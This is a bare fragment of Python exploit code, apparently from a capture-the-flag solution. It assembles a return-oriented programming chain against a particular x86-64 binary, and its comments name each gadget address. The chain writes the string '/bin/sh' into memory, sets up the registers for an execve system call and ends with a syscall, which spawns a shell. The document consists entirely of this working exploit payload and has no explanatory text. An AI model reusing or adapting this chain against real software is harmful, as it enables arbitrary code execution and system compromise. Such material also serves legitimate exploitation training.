payload = p64(0x405032)
#0x0000000000405032: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40e0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x405032)
# 0x0000000000405032: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40e0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x405604)
# 0x0000000000405604: pop rdi; pop rbp; ret; 
payload += p64(0x40e070)+p64(0x0)+p64(0x40121f)
# 0x000000000040121f: mov eax, 0; test rax, rax; je 0x1230; mov edi, 0x40e080; jmp rax; 
payload += p64(0x404dbd)
# 0x0000000000404dbd: mov edx, eax; shr rdx, 0x3f; add rax, rdx; sar rax, 1; jne 0x4dcd; pop rbp; ret; 
payload += p64(0x0)+p64(0x405602)
# 0x0000000000405602: pop rsi; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x405031)
# 0x0000000000405031: pop rax; pop rbx; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x4020db)
# 0x00000000004020db: syscall; 
payload += b''
